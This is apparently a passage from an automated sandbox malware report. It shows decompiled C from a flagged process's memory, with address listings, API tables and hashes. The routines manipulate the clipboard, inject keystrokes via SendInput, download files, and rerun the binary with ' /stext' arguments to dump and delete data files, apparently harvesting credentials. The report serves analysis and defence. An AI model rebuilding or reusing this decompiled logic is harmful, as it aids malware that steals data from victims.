                                    										__ecx = L00401E49( &_v424, __edx, __eflags, 0);
                                    										__eax = E00402489();
                                    										__ecx =  &_v428;
                                    										__ecx = L00401E49( &_v428, __edx, __eflags, 0);
                                    										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                                    										goto L75;
                                    									}
                                    									goto L120;
                                    								case 0x26:
                                    									__eax = OpenClipboard(0);
                                    									__eflags = __eax;
                                    									if(__eax != 0) {
                                    										__eax = EmptyClipboard();
                                    										L75:
                                    										__eax = CloseClipboard();
                                    										goto L76;
                                    									}
                                    									goto L120;
                                    								case 0x27:
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = E00402489();
                                    									__ecx =  &_v424;
                                    									__esi = __eax;
                                    									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__edx = __esi;
                                    									__ecx = __eax;
                                    									__eax = L0040F69B();
                                    									goto L120;
                                    								case 0x28:
                                    									__eax =  &_v404;
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									_v404 = 0;
                                    									_v408 = 0;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__edx =  &_v412;
                                    									__ecx = __eax;
                                    									__eax = E00417111(__eax, __edx,  &_v404);
                                    									__eflags = __eax - 1;
                                    									if(__eax == 1) {
                                    										__edx = _v404;
                                    										__ecx = _v408;
                                    										L0040F69B() = L004394F1(_v408);
                                    										L26:
                                    										_pop(__ecx);
                                    									}
                                    									goto L120;
                                    								case 0x29:
                                    									__eax = L0040A732(__edx);
                                    									goto L120;
                                    								case 0x2a:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = L00413CC0(__edx);
                                    									goto L97;
                                    								case 0x2b:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = L004117F1(__edx);
                                    									goto L97;
                                    								case 0x2c:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E00405367(__edx);
                                    									goto L97;
                                    								case 0x2d:
                                    									_push(__ecx);
                                    									__esi = 0x46c560;
                                    									__ecx = 0x46c560;
                                    									__eax = E00402489();
                                    									__ecx = 0x46c560;
                                    									__eax = L00401F95(0x46c560);
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									E00402489() = __eax + 1;
                                    									__ecx =  &_v424;
                                    									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__ecx = 0x46c518;
                                    									__edx = L00401F95(0x46c518);
                                    									__eax = E00410C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                                    									goto L97;
                                    								case 0x2e:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = L0040EE3B(__edx);
                                    									goto L97;
                                    								case 0x2f:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = L00415B9C(__edx);
                                    									L97:
                                    									goto L120;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				L125:
                                    			}
                                    0x00000000
                                    0x004126db
                                    0x004126dd
                                    0x004126e9
                                    0x004126eb
                                    0x004126f1
                                    0x004126f5
                                    0x004126fb
                                    0x00412700
                                    0x0041270a
                                    0x0041271d
                                    0x00412723
                                    0x00412727
                                    0x0041272c
                                    0x00000000
                                    0x00000000
                                    0x00412737
                                    0x0041273b
                                    0x00412741
                                    0x00412746
                                    0x0041274b
                                    0x00412751
                                    0x00412759
                                    0x0041275d
                                    0x00412762
                                    0x00412765
                                    0x0041276d
                                    0x00000000
                                    0x0041276d
                                    0x00000000
                                    0x00000000
                                    0x00412779
                                    0x0041277b
                                    0x00412787
                                    0x00412795
                                    0x00000000
                                    0x00000000
                                    0x004127a2
                                    0x004127a6
                                    0x004127ac
                                    0x004127b1
                                    0x004127b8
                                    0x004127c1
                                    0x004127c3
                                    0x004127cf
                                    0x004127d1
                                    0x004127d9
                                    0x004127e2
                                    0x004127e4
                                    0x004127ea
                                    0x004127f0
                                    0x004127f2
                                    0x004127f8
                                    0x004127f8
                                    0x004127f8
                                    0x00412800
                                    0x00412808
                                    0x0041280e
                                    0x00412810
                                    0x00412812
                                    0x00000000
                                    0x00000000
                                    0x0041281d
                                    0x00000000
                                    0x00000000
                                    0x0041282b
                                    0x0041282f
                                    0x00412834
                                    0x00412837
                                    0x0041283a
                                    0x0041283f
                                    0x00412844
                                    0x00000000
                                    0x00000000
                                    0x0041284e
                                    0x00412853
                                    0x00000000
                                    0x00000000
                                    0x0041285d
                                    0x00412862
                                    0x00000000
                                    0x00000000
                                    0x0041286e
                                    0x00412872
                                    0x00412878
                                    0x0041287d
                                    0x00412882
                                    0x00000000
                                    0x00000000
                                    0x00412891
                                    0x00412891
                                    0x00412897
                                    0x0041289d
                                    0x004128a2
                                    0x004128a5
                                    0x004128a8
                                    0x004128ad
                                    0x004128b2
                                    0x00000000
                                    0x00000000
                                    0x004128c2
                                    0x004128c7
                                    0x004128c9
                                    0x004128ce
                                    0x00412887
                                    0x00412887
                                    0x00000000
                                    0x00000000
                                    0x00412f9a
                                    0x00412fa0
                                    0x00412fa6
                                    0x00412fa8
                                    0x00412faa
                                    0x00412faa
                                    0x00000000
                                    0x00000000
                                    0x004128d2
                                    0x004128d4
                                    0x004128d9
                                    0x004128df
                                    0x004128e4
                                    0x004128e9
                                    0x004128ee
                                    0x004128f3
                                    0x004128f6
                                    0x004128fb
                                    0x004128fd
                                    0x004128fe
                                    0x004128ff
                                    0x00412900
                                    0x00412901
                                    0x00412906
                                    0x00412908
                                    0x0041290d
                                    0x00412910
                                    0x00412912
                                    0x00412917
                                    0x0041291d
                                    0x00412928
                                    0x0041291f
                                    0x0041291f
                                    0x00412924
                                    0x0041292f
                                    0x00412931
                                    0x0041293c
                                    0x0041293e
                                    0x00000000
                                    0x00000000
                                    0x00412948
                                    0x0041294e
                                    0x00412953
                                    0x00000000
                                    0x00000000
                                    0x0041295d
                                    0x0041295f
                                    0x00412965
                                    0x0041296b
                                    0x00412970
                                    0x00412973
                                    0x00412976
                                    0x0041297d
                                    0x00412986
                                    0x00412988
                                    0x00412994
                                    0x00412997
                                    0x004129a0
                                    0x004129a2
                                    0x004129a8
                                    0x004129af
                                    0x004129b3
                                    0x004129ba
                                    0x004129bc
                                    0x004129c2
                                    0x004129c8
                                    0x004129ca
                                    0x004129cc
                                    0x00000000
                                    0x00000000
                                    0x004129df
                                    0x004129f2
                                    0x00000000
                                    0x00000000
                                    0x004129fd
                                    0x00412a03
                                    0x00412a09
                                    0x00412a0e
                                    0x00412a11
                                    0x00412a14
                                    0x00412a1b
                                    0x00412a1f
                                    0x00412a24
                                    0x00412a27
                                    0x00412a2f
                                    0x00412a34
                                    0x004128b7
                                    0x004128b7
                                    0x00000000
                                    0x00000000
                                    0x00412a3e
                                    0x00412a47
                                    0x00412a4f
                                    0x00000000
                                    0x00000000
                                    0x00412a5a
                                    0x00412a61
                                    0x00000000
                                    0x00000000
                                    0x00412a6f
                                    0x00412a6f
                                    0x00412a75
                                    0x00412a67
                                    0x00412a69
                                    0x00000000
                                    0x00412a69
                                    0x004133f0
                                    0x004133f5
                                    0x004133f6
                                    0x004133f8
                                    0x004133fa
                                    0x004133ff
                                    0x00413400
                                    0x00413402
                                    0x00413405
                                    0x00413407
                                    0x00413408
                                    0x0041340a
                                    0x0041340f
                                    0x00413410
                                    0x00413412
                                    0x00413414
                                    0x00413417
                                    0x00413418
                                    0x0041341b
                                    0x0041341c
                                    0x00413422
                                    0x00413424
                                    0x00413426
                                    0x00413428
                                    0x0041342e
                                    0x0041342f
                                    0x00413430
                                    0x00413436
                                    0x00413439
                                    0x0041343b
                                    0x0041343c
                                    0x0041343f
                                    0x00413440
                                    0x00413443
                                    0x00413444
                                    0x00413448
                                    0x0041344e
                                    0x00413451
                                    0x00413458
                                    0x0041345a
                                    0x0041345d
                                    0x0041345f
                                    0x00413460
                                    0x00413463
                                    0x00413464
                                    0x00413467
                                    0x00413468
                                    0x0041346a
                                    0x0041346d
                                    0x0041346e
                                    0x00413471
                                    0x00413473
                                    0x00413474
                                    0x00413477
                                    0x00413478
                                    0x0041347b
                                    0x0041347c
                                    0x00413480
                                    0x00413486
                                    0x00413489
                                    0x0041348b
                                    0x0041348c
                                    0x0041348e
                                    0x00413491
                                    0x00413497
                                    0x00413498
                                    0x0041349b
                                    0x0041349c
                                    0x0041349e
                                    0x004134a3
                                    0x004134a4
                                    0x004134a7
                                    0x004134a8
                                    0x004134ab
                                    0x004134ac
                                    0x004134b2
                                    0x004134b4
                                    0x004134b6
                                    0x004134b8
                                    0x004134ba
                                    0x004134bb
                                    0x004134bc
                                    0x004134be
                                    0x004134be
                                    0x004134c1
                                    0x004134c3
                                    0x004134c4
                                    0x004134c6
                                    0x004134c9
                                    0x004134cb
                                    0x004134cc
                                    0x004134ce
                                    0x004134d1
                                    0x004134d3
                                    0x004134d4
                                    0x004134da
                                    0x004134dd
                                    0x004134de
                                    0x004134e1
                                    0x004134e3
                                    0x004134e4
                                    0x004134e7
                                    0x004134e8
                                    0x004134eb
                                    0x004134ec
                                    0x004134ef
                                    0x004134f0
                                    0x004134f0
                                    0x004134f0
                                    0x004134f2
                                    0x004134f5
                                    0x004134f8
                                    0x004134fb
                                    0x004134fc
                                    0x004134fe
                                    0x00413501
                                    0x00413503
                                    0x00413504
                                    0x00413506
                                    0x00413509
                                    0x00413509
                                    0x00413509
                                    0x0041350a
                                    0x0041350d
                                    0x0041350f
                                    0x00413510
                                    0x00413512
                                    0x00413514
                                    0x00413516
                                    0x00413518
                                    0x0041351a
                                    0x0041351b
                                    0x0041351c
                                    0x0041351e
                                    0x00413520
                                    0x00413522
                                    0x00413524
                                    0x00413526
                                    0x00413528
                                    0x0041352a
                                    0x0041352c
                                    0x00413531
                                    0x00413533
                                    0x00413534
                                    0x00413535
                                    0x00413539
                                    0x00413541
                                    0x00413543
                                    0x00413544
                                    0x00000000
                                    0x00000000
                                    0x00412a7c
                                    0x00000000
                                    0x00000000
                                    0x00412a8e
                                    0x00412a8e
                                    0x00412a94
                                    0x00000000
                                    0x00000000
                                    0x00412a88
                                    0x00412a88
                                    0x00412a96
                                    0x00412a98
                                    0x00412aa2
                                    0x00412aa4
                                    0x00412aab
                                    0x00412aaf
                                    0x00412ab6
                                    0x00412ab8
                                    0x00412abd
                                    0x00412abf
                                    0x00412ac4
                                    0x00412aca
                                    0x00412acb
                                    0x00412acc
                                    0x00412ad5
                                    0x00412ad8
                                    0x00412ae1
                                    0x00412ae3
                                    0x00412ae8
                                    0x00412ae9
                                    0x00412aea
                                    0x00412af0
                                    0x00412af2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00412b1c
                                    0x00412b1c
                                    0x00412b22
                                    0x00000000
                                    0x00000000
                                    0x00412b16
                                    0x00412b16
                                    0x00412b26
                                    0x00412b2f
                                    0x00412b31
                                    0x00412b38
                                    0x00412b3c
                                    0x00412b43
                                    0x00412b45
                                    0x00412b4a
                                    0x00412b4c
                                    0x00412b51
                                    0x00412b57
                                    0x00412b5b
                                    0x00412b62
                                    0x00412b66
                                    0x00412b68
                                    0x00412b6d
                                    0x00412b70
                                    0x00412b73
                                    0x00412b78
                                    0x00412b7a
                                    0x00412b7f
                                    0x00412b82
                                    0x00412b84
                                    0x00412af8
                                    0x00412af8
                                    0x00412afb
                                    0x00412aff
                                    0x00412b07
                                    0x00412b0c
                                    0x00412b0c
                                    0x00000000
                                    0x00000000
                                    0x00412b91
                                    0x00412b9a
                                    0x00412b9c
                                    0x00412ba8
                                    0x00412bad
                                    0x00412bb9
                                    0x00412bbb
                                    0x00412bc1
                                    0x00412bc3
                                    0x00412bcd
                                    0x00412bd6
                                    0x00000000
                                    0x00000000
                                    0x00412be1
                                    0x00412be6
                                    0x00412be8
                                    0x00412bed
                                    0x00412bf2
                                    0x00412bf7
                                    0x00412bf9
                                    0x00412bfe
                                    0x00412c02
                                    0x00412c03
                                    0x00412c05
                                    0x00412c1d
                                    0x00412c22
                                    0x00412c27
                                    0x00412c29
                                    0x00412c2e
                                    0x00412c32
                                    0x00412c33
                                    0x00412c35
                                    0x00412c50
                                    0x00412c55
                                    0x00412c5a
                                    0x00412c5c
                                    0x00412c61
                                    0x00412c63
                                    0x00412c98
                                    0x00412c9f
                                    0x00412ca6
                                    0x00412caa
                                    0x00412cac
                                    0x00412cb1
                                    0x00412cb6
                                    0x00412cb8
                                    0x00412cbd
                                    0x00412cbe
                                    0x00412cc0
                                    0x00412cc6
                                    0x00412cca
                                    0x00412ccf
                                    0x00412cd4
                                    0x00412cd6
                                    0x00412cdb
                                    0x00412cdd
                                    0x00412ce3
                                    0x00412ce4
                                    0x00412ce5
                                    0x00000000
                                    0x00412ce5
                                    0x00412cc2
                                    0x00412cc2
                                    0x00412cc3
                                    0x00412ce7
                                    0x00412ce7
                                    0x00412ce7
                                    0x00412c65
                                    0x00412c65
                                    0x00412c68
                                    0x00412c71
                                    0x00412c73
                                    0x00412c79
                                    0x00412c7e
                                    0x00412c7e
                                    0x00000000
                                    0x00412c7e
                                    0x00412c37
                                    0x00412c3e
                                    0x00412c40
                                    0x00412c46
                                    0x00412c4b
                                    0x00000000
                                    0x00412c4b
                                    0x00412c07
                                    0x00412c0e
                                    0x00412c10
                                    0x00412c16
                                    0x00412c81
                                    0x00412c81
                                    0x00412c83
                                    0x00412c83
                                    0x00000000
                                    0x00000000
                                    0x00412d88
                                    0x00412d89
                                    0x00412d8f
                                    0x00412d91
                                    0x00412d9f
                                    0x00412da9
                                    0x00412db1
                                    0x00412db7
                                    0x00412dbe
                                    0x00412dc2
                                    0x00412dc6
                                    0x00412dcb
                                    0x00412dce
                                    0x00412dd2
                                    0x00412dd4
                                    0x00412dd9
                                    0x00412ddb
                                    0x00412de0
                                    0x00413189
                                    0x00413189
                                    0x0041318d
                                    0x0041318d
                                    0x0041318d
                                    0x00000000
                                    0x00000000
                                    0x00412cf5
                                    0x00412cf7
                                    0x00412cfd
                                    0x00412d04
                                    0x00412d0d
                                    0x00412d0f
                                    0x00412d14
                                    0x00412d23
                                    0x00412d26
                                    0x00412d2d
                                    0x00412d31
                                    0x00412d38
                                    0x00412d3a
                                    0x00412d41
                                    0x00412d4a
                                    0x00412d65
                                    0x00000000
                                    0x00412d65
                                    0x00000000
                                    0x00000000
                                    0x00412d6e
                                    0x00412d74
                                    0x00412d76
                                    0x00412d7c
                                    0x00412d82
                                    0x00412d82
                                    0x00000000
                                    0x00412d82
                                    0x00000000
                                    0x00000000
                                    0x00412dea
                                    0x00412dec
                                    0x00412df6
                                    0x00412df8
                                    0x00412dfe
                                    0x00412e02
                                    0x00412e09
                                    0x00412e0b
                                    0x00412e10
                                    0x00412e12
                                    0x00412e14
                                    0x00000000
                                    0x00000000
                                    0x00412e1e
                                    0x00412e22
                                    0x00412e26
                                    0x00412e2a
                                    0x00412e2e
                                    0x00412e37
                                    0x00412e39
                                    0x00412e3e
                                    0x00412e42
                                    0x00412e44
                                    0x00412e4a
                                    0x00412e4d
                                    0x00412e53
                                    0x00412e57
                                    0x00412e64
                                    0x00412817
                                    0x00412817
                                    0x00412817
                                    0x00000000
                                    0x00000000
                                    0x00412e6e
                                    0x00000000
                                    0x00000000
                                    0x00412e7a
                                    0x00412e7e
                                    0x00412e83
                                    0x00412e86
                                    0x00412e8e
                                    0x00000000
                                    0x00000000
                                    0x00412e9a
                                    0x00412e9e
                                    0x00412ea3
                                    0x00412ea6
                                    0x00412eae
                                    0x00000000
                                    0x00000000
                                    0x00412eba
                                    0x00412ebe
                                    0x00412ec3
                                    0x00412ec6
                                    0x00412ece
                                    0x00000000
                                    0x00000000
                                    0x00412ed8
                                    0x00412ed9
                                    0x00412ede
                                    0x00412ee0
                                    0x00412ee6
                                    0x00412ee8
                                    0x00412eee
                                    0x00412ef0
                                    0x00412efa
                                    0x00412f01
                                    0x00412f02
                                    0x00412f0d
                                    0x00412f0f
                                    0x00412f1a
                                    0x00412f24
                                    0x00412f26
                                    0x00000000
                                    0x00000000
                                    0x00412f32
                                    0x00412f36
                                    0x00412f3b
                                    0x00412f3e
                                    0x00412f46
                                    0x00000000
                                    0x00000000
                                    0x00412f7c
                                    0x00412f80
                                    0x00412f85
                                    0x00412f88
                                    0x00412f90
                                    0x004130e5
                                    0x00000000
                                    0x00000000
                                    0x00412454
                                    0x0041244c
                                    0x00412442
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: 8E@
                                    • API String ID: 180926312-787191786
                                    • Opcode ID: a2747b3eb99a265ea1a7242231bca69a4225098167f95aa3a6dfd7fc5bed8964
                                    • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                                    • Opcode Fuzzy Hash: a2747b3eb99a265ea1a7242231bca69a4225098167f95aa3a6dfd7fc5bed8964
                                    • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E004062D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				void* _v20;
                                    				long _v24;
                                    				char _v48;
                                    				char _v72;
                                    				void _v100076;
                                    				void* __ebx;
                                    				void* _t37;
                                    				WCHAR* _t39;
                                    				long _t46;
                                    				struct _OVERLAPPED* _t58;
                                    				intOrPtr _t77;
                                    				long _t81;
                                    				void* _t82;
                                    				void* _t84;
                                    				void* _t87;
                                    
                                    				L00450D30();
                                    				_t74 =  &_a12;
                                    				asm("xorps xmm0, xmm0");
                                    				_v16 = __ecx;
                                    				_t58 = 0;
                                    				asm("movlpd [ebp-0x8], xmm0");
                                    				_v24 = 0;
                                    				E0040331A(0,  &_v48, __eflags, L00407514( &_v72,  &_a12, __eflags, L".part"));
                                    				L00401EF0();
                                    				_t37 = CreateFileW(L00401EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
                                    				_v20 = _t37;
                                    				_t84 = _v8 - _a8;
                                    				if(_t84 > 0) {
                                    					L8:
                                    					CloseHandle(_t37);
                                    					_t39 = L00401EEB( &_a12);
                                    					MoveFileW(L00401EEB( &_v48), _t39);
                                    					_t58 = 1;
                                    				} else {
                                    					_t77 = _a4;
                                    					if(_t84 < 0) {
                                    						goto L3;
                                    					} else {
                                    						_t85 = _v12 - _t77;
                                    						if(_v12 >= _t77) {
                                    							goto L8;
                                    						} else {
                                    							while(1) {
                                    								L3:
                                    								_t46 = L00404B5A( &_v100076, 0x186a0);
                                    								_t81 = _t46;
                                    								asm("cdq");
                                    								_v12 = _v12 + _t46;
                                    								asm("adc [ebp-0x4], edx");
                                    								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                                    								_t82 = _t82 - 0x18;
                                    								E004020AB(_t58, _t82, _t74, _t85,  &_v12, 8);
                                    								L00404AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
                                    								if(_t81 <= 0) {
                                    									break;
                                    								}
                                    								_t87 = _v8 - _a8;
                                    								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                                    									continue;
                                    								} else {
                                    									_t37 = _v20;
                                    									goto L8;
                                    								}
                                    								goto L9;
                                    							}
                                    							CloseHandle(_v20);
                                    							DeleteFileW(L00401EEB( &_v48));
                                    						}
                                    					}
                                    				}
                                    				L9:
                                    				L00401EF0();
                                    				L00401EF0();
                                    				return _t58;
                                    			}

                                    0x004062e0
                                    0x004062e9
                                    0x004062ed
                                    0x004062f0
                                    0x004062f3
                                    0x004062f5
                                    0x00406302
                                    0x0040630f
                                    0x00406317
                                    0x00406331
                                    0x0040633a
                                    0x0040633d
                                    0x00406340
                                    0x004063b2
                                    0x004063b3
                                    0x004063bc
                                    0x004063cb
                                    0x004063d1
                                    0x00406342
                                    0x00406342
                                    0x00406345
                                    0x00000000
                                    0x00406347
                                    0x00406347
                                    0x0040634a
                                    0x00000000
                                    0x0040634c
                                    0x0040634c
                                    0x0040634c
                                    0x0040635b
                                    0x00406360
                                    0x00406362
                                    0x00406363
                                    0x0040636a
                                    0x00406379
                                    0x0040637f
                                    0x0040638a
                                    0x00406394
                                    0x0040639b
                                    0x00000000
                                    0x00000000
                                    0x004063a3
                                    0x004063a6
                                    0x00000000
                                    0x004063af
                                    0x004063af
                                    0x00000000
                                    0x004063af
                                    0x00000000
                                    0x004063a6
                                    0x004063ef
                                    0x004063fe
                                    0x004063fe
                                    0x0040634a
                                    0x00406345
                                    0x004063d3
                                    0x004063d6
                                    0x004063de
                                    0x004063eb

                                    APIs
                                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
                                    • CloseHandle.KERNEL32(00000000), ref: 004063B3
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                    • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063EF
                                    • DeleteFileW.KERNEL32(00000000), ref: 004063FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                    • String ID: .part
                                    • API String ID: 820096542-3499674018
                                    • Opcode ID: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                                    • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                                    • Opcode Fuzzy Hash: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                                    • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                                    • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                    • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                                    • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                    • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E00410305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
                                    				char _v5;
                                    				char _v6;
                                    				char _v7;
                                    				char _v12;
                                    				char _v36;
                                    				char _v60;
                                    				char _v84;
                                    				char _v108;
                                    				char _v132;
                                    				char _v156;
                                    				char _v180;
                                    				char _v204;
                                    				char _v228;
                                    				char _v252;
                                    				char _v276;
                                    				char _v300;
                                    				char _v324;
                                    				char _v348;
                                    				char _v372;
                                    				char _v396;
                                    				char _v420;
                                    				char _v444;
                                    				char _v468;
                                    				short _v988;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* _t173;
                                    				void* _t199;
                                    				void* _t225;
                                    				void* _t226;
                                    				void* _t394;
                                    				void* _t399;
                                    				void* _t402;
                                    				void* _t405;
                                    
                                    				_t405 = __eflags;
                                    				_v12 = 0;
                                    				GetModuleFileNameW(0,  &_v988, 0x104);
                                    				_v5 = 0;
                                    				_v6 = 0;
                                    				E004020D5(0,  &_v300);
                                    				E004020D5(0,  &_v276);
                                    				E004020D5(0,  &_v252);
                                    				E0041800F( &_v228, 0x30, L00401F95(E00417093( &_v36)));
                                    				L00401FC7();
                                    				E0041800F( &_v204, 0x30, L00401F95(E00417093( &_v36)));
                                    				L00401FC7();
                                    				E0041800F( &_v180, 0x30, L00401F95(E00417093( &_v36)));
                                    				L00401FC7();
                                    				L00401F95( &_a52);
                                    				_t393 = L" /stext \"";
                                    				_t224 = E0041432B(L00401EEB(E004030A6(0,  &_v396, E00404429(0,  &_v420, E00404405(0,  &_v444,  &_v988, _t405, E0040427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401F95( &_a76);
                                    				_t225 = E0041432B(L00401EEB(E004030A6(_t224,  &_v324, E00404429(_t137,  &_v348, E00404405(_t137,  &_v372,  &_v988, _t405, E0040427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401F95( &_a100);
                                    				_v7 = E0041432B(L00401EEB(E004030A6(_t225,  &_v84, E00404429(_t225,  &_v108, E00404405(_t225,  &_v132,  &_v988, _t405, E0040427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				_t399 =  ==  ? 1 : 0;
                                    				if(_t225 == 0) {
                                    					_t399 = _t399 + 1;
                                    				}
                                    				if(_v7 == 0) {
                                    					_t399 = _t399 + 1;
                                    				}
                                    				_t226 = DeleteFileW;
                                    				_t394 = 0;
                                    				L5:
                                    				L5:
                                    				if(L004179DC(L00401EEB( &_v228),  &_v300) != 0) {
                                    					_v12 = 1;
                                    					DeleteFileW(L00401EEB( &_v228));
                                    				}
                                    				if(L004179DC(L00401EEB( &_v204),  &_v276) != 0) {
                                    					_v5 = 1;
                                    					DeleteFileW(L00401EEB( &_v204));
                                    				}
                                    				if(L004179DC(L00401EEB( &_v180),  &_v252) != 0) {
                                    					_v6 = 1;
                                    					DeleteFileW(L00401EEB( &_v180));
                                    				}
                                    				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
                                    					goto L14;
                                    				}
                                    				L15:
                                    				_t173 = L00405A6F("0");
                                    				_t418 = _t173;
                                    				if(_t173 == 0) {
                                    					L00402F93(_t226, _t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402FB7( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
                                    					_push(0x6a);
                                    					L00404AA4(_t226, 0x46c650, _t180, __eflags);
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    				} else {
                                    					_t199 = E00417226(_t226,  &_v324, _t399);
                                    					L00402F1D(_t402 - 0x18, L00402F93(_t226,  &_v156, L00402F93(_t226,  &_v132, L00402F93(_t226,  &_v108, L00402F93(_t226,  &_v84, L00402F93(_t226,  &_v60, L00402F93(_t226,  &_v372, L00402FB7( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
                                    					_push(0x69);
                                    					L00404AA4(_t226, 0x46c650, _t207, _t418);
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    				}
                                    				L00401FC7();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				return L00401FC7();
                                    				L14:
